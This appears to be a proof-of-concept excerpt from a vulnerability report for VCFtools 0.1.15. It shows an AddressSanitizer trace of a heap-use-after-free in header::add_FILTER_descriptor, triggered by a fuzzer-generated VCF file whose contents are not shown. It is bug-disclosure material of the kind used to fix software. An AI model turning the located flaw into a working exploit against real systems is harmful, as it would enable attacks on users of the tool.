Proof Of Concept
Excerpt from running the malicious file against a vulnerable version compiled with ASAN:
$:~/Downloads/vcftools/git$ ASAN_SYMBOLIZER_PATH='/usr/lib/llvm-4.0/bin/llvm-symbolizer' vcftools --vcf /tmp/crashes/id\:000075\,sig\:11\,src\:000655\,op\:flip4\,pos\:102
VCFtools - 0.1.15
(C) Adam Auton and Anthony Marcketta 2009
Parameters as interpreted:
--vcf /tmp/crashes/id:000075,sig:11,src:000655,op:flip4,pos:102
=================================================================
==16428==ERROR: AddressSanitizer: heap-use-after-free on address 0xb5c0040c at pc 0x080fd3be bp 0xbf908d18 sp 0xbf9088f0
READ of size 2 at 0xb5c0040c thread T0
#0 0x80fd3bd in __interceptor_memcmp (/usr/local/bin/vcftools+0x80fd3bd)
#1 0xb7678e15 in std::string::compare(char const*) const (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xace15)
#2 0x8242d2e in bool std::operator==<char, std::char_traits<char>, std::allocator<char> >(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const*) /usr/bin/../lib/gcc/i686-linux-gnu/4.8/../../../../include/c++/4.8/bits/basic_string.h:2521:20
#3 0x8242d2e in header::add_FILTER_descriptor(std::string const&, int) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:345
#4 0x823cd8a in header::parse_meta(std::string const&, unsigned int&) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:34:17
#5 0x847fb35 in vcf_file::read_header() /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:62:15
#6 0x847ef84 in vcf_file::vcf_file(parameters const&, bool) /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:42:2
#7 0x8488cea in main /home/rchiscariu/Downloads/vcftools/src/cpp/vcftools.cpp:31:12
#8 0xb73a6af2 in __libc_start_main /build/eglibc-oD_LfC/eglibc-2.19/csu/libc-start.c:287
#9 0x807057b in _start (/usr/local/bin/vcftools+0x807057b)
0xb5c0040c is located 12 bytes inside of 24-byte region [0xb5c00400,0xb5c00418)
freed by thread T0 here:
#0 0x818d88c in operator delete(void*) (/usr/local/bin/vcftools+0x818d88c)
#1 0xb76791aa in std::string::_Rep::_M_destroy(std::allocator<char> const&) (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xad1aa)
#2 0x8242d06 in header::add_FILTER_descriptor(std::string const&, int) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:344:3
#3 0x823cd8a in header::parse_meta(std::string const&, unsigned int&) /home/rchiscariu/Downloads/vcftools/src/cpp/header.cpp:34:17
#4 0x847fb35 in vcf_file::read_header() /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:62:15
#5 0x847ef84 in vcf_file::vcf_file(parameters const&, bool) /home/rchiscariu/Downloads/vcftools/src/cpp/vcf_file.cpp:42:2
#6 0x8488cea in main /home/rchiscariu/Downloads/vcftools/src/cpp/vcftools.cpp:31:12
#7 0xb73a6af2 in __libc_start_main /build/eglibc-oD_LfC/eglibc-2.19/csu/libc-start.c:287
previously allocated by thread T0 here:
#0 0x818c994 in operator new(unsigned int) (/usr/local/bin/vcftools+0x818c994)
#1 0xb7679003 in std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (/usr/lib/i386-linux-gnu/libstdc++.so.6+0xad003)
SUMMARY: AddressSanitizer: heap-use-after-free (/usr/local/bin/vcftools+0x80fd3bd) in __interceptor_memcmp
Shadow bytes around the buggy address:
0x36b80030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b80040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b80050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b80060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b80070: fa fa fa fa fa fa fa fa fa fa 00 00 00 07 fa fa
=>0x36b80080: fd[fd]fd fa fa fa fd fd fd fa fa fa 00 00 03 fa
0x36b80090: fa fa fd fd fd fd fa fa 00 00 03 fa fa fa 00 00
0x36b800a0: 00 00 fa fa 00 00 01 fa fa fa 00 00 00 fa fa fa
0x36b800b0: 00 00 01 fa fa fa fd fd fd fa fa fa fd fd fd fd
0x36b800c0: fa fa 00 00 01 fa fa fa fd fd fd fa fa fa 00 00
0x36b800d0: 03 fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==16428==ABORTING
======================================================================